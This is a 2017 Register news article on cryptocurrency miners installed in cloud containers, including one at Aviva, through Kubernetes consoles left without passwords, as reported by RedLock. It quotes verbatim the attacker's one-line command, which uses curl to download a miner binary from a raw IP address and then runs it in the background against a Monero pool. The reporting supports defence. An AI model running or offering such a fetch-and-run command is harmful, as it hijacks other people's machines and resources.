Crypto-coin miners caught toiling away in hacked cloud boxes

Manic miners don't even pwn you: They just use default creds admins are too lazy to change

By Richard Chirgwin

Posted in Security, 17th October 2017 05:28 GMT

Here's yet another reason to make sure you lock down your clutch of cloud services: cryptocurrency mining.

Security outfit RedLock's security trends report [PDF], out this month, said developers and organizations are not securing their AWS, Azure and Google Cloud Platform systems, allowing miscreants to hijack them to steal processor cycles for digging up alt-coins. It's believed hackers are able to get into boxes by using their default credentials.

RedLock says companies stung this way included security company Gemalto and insurer Aviva.

Its investigators “found a number of Kubernetes administrative consoles deployed on Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform that were not password protected,” the report stated.

It's one way to save yourself the price of enough iron to mine even one Bitcoin. For example, the Bitcoin Energy Index estimates the total energy consumed by miners over the next year will be 21 Terawatt-hours, and it takes 215 kWH for a single transaction.

However, you'd be a fool to mine Bitcoin in the cloud when newbie currency Monero is much easier to craft, and one XMR is worth about $95 right now. Most web-based miners – such Coin Hive's spotted on various websites – dig up Monero cash at a rapid pace on commodity hardware.

In Aviva's case, RedLock says the cyber-dosh miner was discovered running in a MySQL container, and it communicated back to a Gmail account. The randomized inbox hinted that someone has automated the process of locating insecure containers and setting up miners within them, and the biz reckoned that theory is supported by this Reddit post.

In that thread, a Redditor uploaded code nearly identical to the command line RedLock found running on Aviva's server, with the same email recipient:

curl -L http://208.115.205.133:8220/minerd -o minerd;chmod 777 minerd && setsid ./minerd -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u didi123123321@gmail.com -p x

Change those credentials, people. ®

Sign up to our NewsletterGet IT in your inbox daily

13 Comments

More from The Register

Oh FNZ, Aviva! System back up, still trudging through queries backlog

2-day email turnarounds as users wail over payment lags

Aviva dumps DXC, shoves data centre support at Atos

Exclusive UK insurance bods find new bit barn bouncer

Microsoft's latest Windows 10 update downs Chrome, Cortana

Redmond, Google and Intel are desperately hunting for a fix

Judge bins sueball lobbed at Malwarebytes by rival antivirus maker for torpedoing its tool

Litigious security biz upset at blanket PC ban

Windows Store nixed Google Chrome 'app' hours after it went live

Installer merely redirected to the official source

Malwarebytes eats upstart

Google shoots Chrome 66's silencer after developer backlash

Games and alerts lost their voice to feature designed to hush auto-play vids

Google buffs Chrome Enterprise with new tub of PartnerShine™

Face it, you're not going to adopt ChromeOS without integrating stuff you already run

Penguins in a sandbox: Google nudges Linux apps toward Chrome OS

While keeping things safe

Chrome 66: Get into the bin, auto-playing vids and Symantec certs!

Lucky 66 lands, complete with Spectre mitigations